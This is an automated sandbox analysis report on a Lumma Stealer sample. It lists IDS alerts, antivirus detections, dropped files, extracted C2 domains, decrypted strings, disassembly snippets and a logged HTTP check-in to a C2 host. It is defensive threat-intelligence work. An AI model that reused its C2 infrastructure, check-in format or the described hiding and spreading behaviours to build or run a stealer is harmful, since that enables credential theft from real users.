ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:35.223222+0200	2056054	1	Domain Observed Used for C2 Detected	192.168.2.7	50403	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:35.254192+0200	2056056	1	Domain Observed Used for C2 Detected	192.168.2.7	54636	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:35.282658+0200	2056058	1	Domain Observed Used for C2 Detected	192.168.2.7	64024	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:33:35.150866+0200	2056172	1	Domain Observed Used for C2 Detected	192.168.2.7	51720	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: NCTSgL4t0B.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199724331900	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/	URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/badges	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ndC0udATSD.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Idle.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Edge\msedge.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\CQuHWLcS.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\LAdenXtG.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb

Found malware configuration

Source: 19.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["tendencerangej.shop", "surveriysiop.shop", "captainynfanw.shop", "coursedonnyre.shop", "tearrybyiwo.shop", "appleboltelwk.shop", "fossillargeiw.shop", "strappystyio.shop", "tiddymarktwo.shop"], "Build id": "1AsNN2--5899070203"}

Multi AV Scanner detection for dropped file

Source: C:\Edge\msedge.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Idle.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\AwpzIjFt.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\CQuHWLcS.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\LUAEjdyP.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\NohnZlpE.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\PDYwKARr.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\WjFdZuSe.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\YtKLaCEq.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\iZOTduyR.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\iyHbCGSC.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\onyQOgMn.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\pGvBroyE.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\tGwZoaKl.log	ReversingLabs: Detection: 29%
Source: C:\Windows\Speech\kdmapper.exe	ReversingLabs: Detection: 68%
Source: C:\Windows\Speech\physmeme.exe	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: NCTSgL4t0B.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\BlhoAAti.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Idle.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LUAEjdyP.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\MsCvKimq.log	Joe Sandbox ML: detected
Source: C:\Edge\msedge.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\PDYwKARr.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\NDQNJGxB.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CQuHWLcS.log	Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: strappystyio.shop
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: coursedonnyre.shop
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fossillargeiw.shop
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tendencerangej.shop
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: appleboltelwk.shop
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tearrybyiwo.shop
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: captainynfanw.shop
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: surveriysiop.shop
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tiddymarktwo.shop
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000013.00000002.1364586825.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 1AsNN2--5899070203

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.7:49706 version: TLS 1.2

Source: NCTSgL4t0B.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 0000000C.00000000.1306786234.0000000000E13000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.10.dr
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.pdb source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Release\Fcs.pdb source: curl.exe, 0000000E.00000003.1323956983.000001EBAEA64000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb66 source: NCTSgL4t0B.exe
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.pdb source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb source: NCTSgL4t0B.exe
Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 0000000E.00000003.1324416558.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1323956983.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1324507313.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325126698.000001EBAEA20000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.14.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DEBAEC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF735DEBAEC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DEA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	12_2_00DEA69B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DFC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	12_2_00DFC220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00E0B348 FindFirstFileExA,	12_2_00E0B348

Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Edge\msedge.exe	File opened: C:\Users\user
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	19_2_0040F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	19_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	19_2_00414031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	19_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	19_2_0043F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, eax	19_2_00407170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	19_2_00441100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	19_2_0044A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	19_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	19_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	19_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	19_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	19_2_0044A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_004473FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	19_2_00424390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_004283A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	19_2_004303B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	19_2_0043F479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	19_2_0042F40F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_00443420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	19_2_0044A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	19_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	19_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	19_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_0044A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	19_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	19_2_004206E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	19_2_00443870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	19_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	19_2_0043A880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_004468B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	19_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	19_2_00426910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	19_2_004449F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	19_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_004499B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	19_2_0043EA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	19_2_00415ADF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	19_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push ebx	19_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	19_2_0040DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_00426B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	19_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	19_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	19_2_00449C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	19_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	19_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	19_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	19_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_00428C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	19_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	19_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	19_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	19_2_00405D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, 0000000Bh	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	19_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	19_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	19_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	19_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	19_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	19_2_0041AF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	19_2_00410F0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	19_2_0042DFD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	19_2_00443FA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.7:50403 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.7:60759 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.7:49694 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.7:51720 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.7:58850 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.7:54636 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.7:65440 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.7:64024 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.7:51956 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49706 -> 172.67.197.40:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49706 -> 172.67.197.40:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: tendencerangej.shop
Source: Malware configuration extractor	URLs: surveriysiop.shop
Source: Malware configuration extractor	URLs: captainynfanw.shop
Source: Malware configuration extractor	URLs: coursedonnyre.shop
Source: Malware configuration extractor	URLs: tearrybyiwo.shop
Source: Malware configuration extractor	URLs: appleboltelwk.shop
Source: Malware configuration extractor	URLs: fossillargeiw.shop
Source: Malware configuration extractor	URLs: strappystyio.shop
Source: Malware configuration extractor	URLs: tiddymarktwo.shop

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: fossillargeiw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: appleboltelwk.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tendencerangej.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tearrybyiwo.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: strappystyio.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tiddymarktwo.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: coursedonnyre.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zelensky.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: captainynfanw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: surveriysiop.shop replaycode: Name error (3)

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

